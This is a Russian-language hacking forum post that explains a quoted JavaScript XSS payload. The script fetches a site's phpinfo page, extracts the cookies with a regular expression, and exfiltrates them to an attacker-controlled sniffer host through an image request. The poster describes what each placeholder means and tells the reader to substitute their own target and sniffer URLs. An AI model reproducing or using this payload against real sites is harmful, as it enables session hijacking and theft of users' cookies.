11.04.2016, 20:00
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Пояснения по этому коду
Сообщение от yarbabin
↑
надеюсь
@psihoz26
меня не покорает за его скрипт)
Код:
var xhr = new XMLHttpRequest();
xhr.open('GET', '/$PARAM1', true);
xhr.send(null);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if(xhr.status == 200) {
(new Image()).src="$PARAM2"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
}
}
- локальная урла сайта, на котором xss и на котором ты можешь читать phpInfo: http://xss.com/some_path/php_info.php
$PARAM2 - сайт с твоим снифером, на который ты "как бы" обращаешься за картинкой и в параметрах запроса указываешь выдранные куки из ответа:
xhr.responseText - ответ с данными от phpInfo,
/_COOKIE.*? (.*?)/m - регулярка, которая выдёргивает куки из ответа.
В итоге именно этот скрипт с изменёнными под тебя $PARAM12 должен выполняться на стороне браузера. |
|
|